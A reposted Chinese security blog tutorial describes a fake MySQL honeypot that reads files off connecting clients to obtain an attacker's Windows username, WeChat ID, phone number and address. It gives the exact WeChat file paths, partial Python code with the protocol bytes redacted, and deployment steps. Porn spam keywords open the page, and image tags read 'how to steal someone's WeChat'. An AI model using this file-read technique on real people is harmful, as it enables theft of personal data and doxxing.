国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

通過蜜罐技術獲取攻擊者手機號、微信號【網(wǎng)絡安全】

這篇具有很好參考價值的文章主要介紹了通過蜜罐技術獲取攻擊者手機號、微信號【網(wǎng)絡安全】。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點擊"舉報違法"按鈕提交疑問。

相關聲明: 以下內容僅限用于紅藍攻防對抗等專業(yè)領域,請勿用于非法用途。

首先,我們先講一下蜜罐的概念,你可以簡單理解較為蜜罐就是一個陷阱,故意暴露一些我們人為設計好的漏洞,讓攻擊者自投羅網(wǎng)。

一、蜜罐介紹

蜜罐是對攻擊者的欺騙技術,用以監(jiān)視、檢測、分析和溯源攻擊行為,其沒有業(yè)務上的用途,所有流入/流出蜜罐的流量都預示著掃描或者攻擊行為,因此可以比較好的聚焦于攻擊流量。

蜜罐可以實現(xiàn)對攻擊者的主動誘捕,能夠詳細地記錄攻擊者攻擊過程中的許多痕跡,可以收集到大量有價值的數(shù)據(jù),如病毒或蠕蟲的源碼、黑客的操作等,從而便于提供豐富的溯源數(shù)據(jù)。另外蜜罐也可以消耗攻擊者的時間,基于JSONP等方式來獲取攻擊者的畫像。

但是蜜罐存在安全隱患,如果沒有做好隔離,可能成為新的攻擊源。

二、Fake Mysql

這里再提一下Fake Mysql的概念,通過偽裝Mysql服務器,誘導攻擊者來連接,利用漏洞來讀取攻擊者電腦的文件從而就有了下面的內容

三、蜜罐技術獲取手機號、微信號、地址

那么如何通過這種技術獲取攻擊者的手機號和微信呢?

正常獲取的思路

我們先來講一下讀取手機號和微信ID的正常方法,分為以下三個步驟

  • 通過C:/Windows/PFRO.log獲取windows用戶名
  • 通過C:/Users/用戶名/Documents/WeChat Files/All Users/config/config.data獲取wxid
  • 通過C:/Users/用戶名/Documents/WeChat Files/wx_id/config/AccInfo.dat獲取地址、微信號、手機號

獲取windows用戶名

我們這里在自己的電腦中進行測試,打開C:/Windows/PFRO.log,可以看到我的用戶名是66396

怎么盜別人的微信,網(wǎng)絡,安全,程序員,web安全,java,網(wǎng)絡安全

獲取wxid

然后,我們訪問C:/Users/66396/Documents/WeChat Files/All Users/config/config.data

這里可以獲取到wxid

怎么盜別人的微信,網(wǎng)絡,安全,程序員,web安全,java,網(wǎng)絡安全

獲取手機號、微信號、地址

可以看到手機號

怎么盜別人的微信,網(wǎng)絡,安全,程序員,web安全,java,網(wǎng)絡安全

還有地址、微信號都有

怎么盜別人的微信,網(wǎng)絡,安全,程序員,web安全,java,網(wǎng)絡安全

上面是黑客入侵后,查看電腦中的文件可以獲取到的信息,那么如何設計一個蜜罐,讓黑客在攻擊時自投羅網(wǎng),幫助我們防守方溯源到攻擊者的信息呢?

【→所有資源關注我,私信回復“資料”獲取←】
1、網(wǎng)絡安全學習路線
2、電子書籍(白帽子)
3、安全大廠內部視頻
4、100份src文檔
5、常見安全面試題
6、ctf大賽經(jīng)典題目解析
7、全套工具包
8、應急響應筆記

四、核心代碼

如何把上述過程進行自動化呢?我們可以看下核心代碼
下面的代碼主要有兩個作用

  1. 判斷是否為掃描器或者密碼爆破工具,進行交互握手,效果是掃描器直接爆3306弱口令。
  2. 如果是直接連接,去讀取設定好的文件,并寫入本地保存。
def mysql_get_file_content(filename,conn,address):
    logpath = os.path.abspath('.') + "/log/" + address[0]
    if not os.path.exists(logpath):
        os.makedirs(logpath)
    conn.sendall("xxx")
    try:
        conn.recv(1024000)
    except Exception as e:
        print(e)
    try:
        conn.sendall("xx")
        res1 = conn.recv(1024000)
        # SHOW VARIABLES
        if 'SHOW VARIABLES' in res1:
            conn.sendall("xxx")
            res2 = conn.recv(9999)
            if 'SHOW WARNINGS' in res2:
                conn.sendall("xxx")
                res3 = conn.recv(9999)
                if 'SHOW COLLATION' in res3:
                    conn.sendall("xxx")
                    res4 = conn.recv(9999)
                    if 'SET NAMES utf8' in res4:
                        conn.sendall("xxx")
                        res5 = conn.recv(9999)
                        if 'SET character_set_results=NULL' in res5:
                            conn.sendall("xxx")
                            conn.close()
                    else:
                        conn.close()
                else:
                    conn.close()
            else:
                conn.close()
        else:
            try:
                wantfile = chr(len(filename) + 1) + "\x00\x00\x01\xFB" + filename
                conn.sendall(wantfile)
                content=''
                while True:
                    data = conn.recv(1024)
                    print len(data)
                    content += data
                    if len(data) < 1024:
                        print 'ok'
                        break
                    
                conn.close()
                item=logpath + "/" + filename.replace("/", "_").replace(":", "")+'_'+str(random.random())
                if len(content) > 6:
                    with open(item, "w") as f:
                        f.write(content)
                        f.close()
                    return (True,content)
                else:
                    return (False,content)
            except Exception as e:
                print (e)
    except Exception as e:
        print (e)

為了防止讀取文件內容不完整,可以加入while循環(huán)。

while True:
        conn, address = sv.accept()
        first_time = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
        global files1
        global username
        global wx_id
        file=files1[0].replace('Administrator',username).replace('wx_id',wx_id)
        res,content = mysql_get_file_content(file,conn,address)
        files1.append(files1[0])
        files1.remove(files1[0])
        if res:
            if 'PFRO' in file:
                username = get_username(content)
                s= "xx" % (xx)
                cursor.execute(s)
                data = cursor.fetchall()
                if len(data)==0:
                    s = "XX" % (xx)
                    cursor.execute(s)
                    db.commit()
                    print 'success:'+ file
                    insert_file(file,address,username)
            elif 'config.data'in file:
                content = content
                wxid = re.findall(r'WeChatFiles\(.*)\config', content)[0]
                sql = "xxx" % (xxx)
                cursor.execute(sql)
                db.commit()
                wx_id=wxid
                img = qrcode.make('weixin://contacts/profile/'+wxid)
                img.save(os.path.abspath('.')+'/static/pic/'+wxid+'.png') 
                print 'success:'+ file
                insert_file(file,address,username)
            elif 'AccInfo' in file:
                content = content
                phone = re.findall(r'[0-9]{11}', content)[-1]
                sql = "xxx" % (xxx)
                cursor.execute(sql)
                db.commit()
                print 'success:'+ file
                insert_file(file,address,username)
        else:
            files1=files
            username='Administrator'

部署方法

我們需要先將工具下載下來傳入服務器

怎么盜別人的微信,網(wǎng)絡,安全,程序員,web安全,java,網(wǎng)絡安全

然后修改webServer.py中admin的密碼,當然,你也可以更換用戶名,這個根據(jù)個人習慣來修改。

怎么盜別人的微信,網(wǎng)絡,安全,程序員,web安全,java,網(wǎng)絡安全

然后通過docker啟用服務

然后運行本項目

docker-compose up -d

使用方法

攻擊者通常會發(fā)現(xiàn)我們網(wǎng)站的一些漏洞,我們這里使用蜜罐技術,故意暴露我們的數(shù)據(jù)庫,我們數(shù)據(jù)庫這里設置弱口令,讓攻擊者可以連接。

攻擊者在使用navicat連接我們的數(shù)據(jù)庫時成功后,我們可以執(zhí)行代碼,讀取到它的手機號、微信號、地址

怎么盜別人的微信,網(wǎng)絡,安全,程序員,web安全,java,網(wǎng)絡安全

并可以在5000端口訪問后臺,輸入我們剛才設置的admin以及密碼fancypig

然后就可以看到攻擊者信息了!參考文獻

怎么盜別人的微信,網(wǎng)絡,安全,程序員,web安全,java,網(wǎng)絡安全文章來源地址http://www.zghlxwxcb.cn/news/detail-653479.html

到了這里,關于通過蜜罐技術獲取攻擊者手機號、微信號【網(wǎng)絡安全】的文章就介紹完了。如果您還想了解更多內容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。如若轉載,請注明出處: 如若內容造成侵權/違法違規(guī)/事實不符,請點擊違法舉報進行投訴反饋,一經(jīng)查實,立即刪除!

領支付寶紅包贊助服務器費用

相關文章

  • 攻擊者使用 Python 編譯的字節(jié)碼來逃避檢測

    攻擊者使用 Python 編譯的字節(jié)碼來逃避檢測

    以 PyPI(Python 包索引)等開源包存儲庫為目標的攻擊者設計了一種新技術,可以將他們的惡意代碼隱藏在安全掃描器、人工審查和其他形式的安全分析中。 在一次事件中,研究人員發(fā)現(xiàn)惡意軟件代碼隱藏在 Python 字節(jié)碼 (PYC) 文件中,該文件可以直接執(zhí)行,而不是源代碼文件由

    2024年02月07日
    瀏覽(21)
  • 生成式人工智能:網(wǎng)絡攻擊者手中的破壞性力量

    生成式人工智能:網(wǎng)絡攻擊者手中的破壞性力量

    2022 年底,公開可用的生成式人工智能工具的推出使我們進入了人類歷史上最大的技術革命之一。 一些人聲稱它的影響與互聯(lián)網(wǎng)、手機、智能手機和社交媒體的引入一樣大,甚至更大。這些新的生成式人工智能技術的采用和發(fā)展速度是我們以前從未見過的。 雖然這場人工智能

    2024年02月06日
    瀏覽(17)
  • 危險的套娃:攻擊者在 PDF 文件中隱藏惡意Word 文檔

    危險的套娃:攻擊者在 PDF 文件中隱藏惡意Word 文檔

    據(jù)BleepingComputer消息,日本計算機緊急響應小組 (JPCERT) 日前分享了在2023 年 7 月檢測到的利用PDF文檔的新型攻擊——PDF MalDoc攻擊,能將惡意 Word 文件嵌入 PDF 來繞過安全檢測。 JPCERT采樣了一種多格式文件,能被大多數(shù)掃描引擎和工具識別為 PDF,但辦公應用程序可以將其作為常

    2024年02月11日
    瀏覽(15)
  • D-LINK SQL注入漏洞讓攻擊者獲得管理員權限

    D-LINK SQL注入漏洞讓攻擊者獲得管理員權限

    D-Link DAR-7000 設備中發(fā)現(xiàn)了一個名為 SQL 注入的安全漏洞。 SQL注入是一種惡意攻擊,它利用Web應用程序中的漏洞注入惡意SQL語句并獲得對數(shù)據(jù)庫的未經(jīng)授權的訪問。 此技術允許攻擊者查看、修改和刪除數(shù)據(jù)庫中的數(shù)據(jù),這可能對數(shù)據(jù)的機密性、完整性和可用性構成重大威脅。

    2024年02月07日
    瀏覽(30)
  • Taro:微信小程序通過獲取手機號實現(xiàn)一鍵登錄

    ????????本文介紹如果通過微信小程序的getPhoneNumber方法獲取用戶微信綁定的手機號并自動注冊登錄。 1、按鈕類型 openType 指定 \\\"getPhoneNumber\\\"?? 2、@getphonenumber必須全部小寫 code:手機號獲取憑證:動態(tài)令牌??赏ㄟ^動態(tài)令牌換取用戶手機號。 ????????后臺根據(jù)前端傳入

    2024年02月16日
    瀏覽(92)
  • 能否通過手機號查詢他人位置及技術實現(xiàn)(省流:不能)

    能否通過手機號查詢他人位置及技術實現(xiàn)(省流:不能)

    ??作者簡介:被吉師散養(yǎng)、喜歡前端、學過后端、練過CTF、玩過DOS、不喜歡java的不知名學生。 ??個人主頁:紅中 ??每日emo:紀念我死去的愛情 ??靈感來源:藝術源于生活,而高于生活 頭部聲明:如果您是來學怎么定位他人的,不好意思,這是違法行為,我不會,也不會

    2024年02月02日
    瀏覽(21)
  • 微信小程序通過code獲取手機號,提示:{errcode: 47001, errmsg: “data format error hint: [xxxxxx] rid: xxxxxx“}的解決辦法

    微信小程序通過code獲取手機號,提示:{errcode: 47001, errmsg: “data format error hint: [xxxxxx] rid: xxxxxx“}的解決辦法

    微信小程序官方文檔里, 需要用POST提交到: https://api.weixin.qq.com/wxa/business/getuserphonenumber?access_token=ACCESS_TOKEN 請求參數(shù)是access_token和code ?看文檔后,會誤認為要提交兩個參數(shù)access_token和code,實際上只需要提交code就行。 提交的地址是:https://api.weixin.qq.com/wxa/business/getuserphonen

    2024年02月09日
    瀏覽(56)
  • 利用蜜罐捕捉攻擊實驗(31)

    利用蜜罐捕捉攻擊實驗(31)

    預備知識 1、蜜罐的含義和作用 ????? 蜜罐(Honeypot)是一種在互聯(lián)網(wǎng)上運行的計算機系統(tǒng)。它是專門為吸引并誘騙那些試圖非法闖入他人計算機系統(tǒng)的人(如電腦黑客)而設計的,蜜罐系統(tǒng)是一個包含漏洞的誘騙系統(tǒng),它通過模擬一個或多個易受攻擊的主機,給攻擊者提供一個

    2024年02月02日
    瀏覽(14)
  • 【網(wǎng)絡安全】蜜罐部署實戰(zhàn)&DecoyMini攻擊誘捕

    【網(wǎng)絡安全】蜜罐部署實戰(zhàn)&DecoyMini攻擊誘捕

    文章到底在講什么? 省流:實戰(zhàn)演示,教你如何偽造一個釣魚網(wǎng)站,獲取對方信息 蜜罐 這個詞,最早是被獵人使用的。獵人把罐子裝上 蜂蜜,然后放個陷阱,專門用來 捕捉喜歡甜食的熊 。 后來在網(wǎng)絡安全領域里, 人們就把 欺騙攻擊者的誘餌 稱為“蜜罐”。 即模擬各種

    2024年02月16日
    瀏覽(17)
  • 微信小程序:登錄授權,根據(jù)手機號獲取憑證,獲取用戶手機號

    1.微信小程序授權 controller 層代碼 wxUtils 工具類 2.微信小程序,用戶手機號獲取 微信小程序,根據(jù)code(code為手機號獲取憑證)獲取用戶加密手機號 獲取用戶手機號方法

    2024年02月14日
    瀏覽(28)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領取紅包,優(yōu)惠每天領

二維碼1

領取紅包

二維碼2

領紅包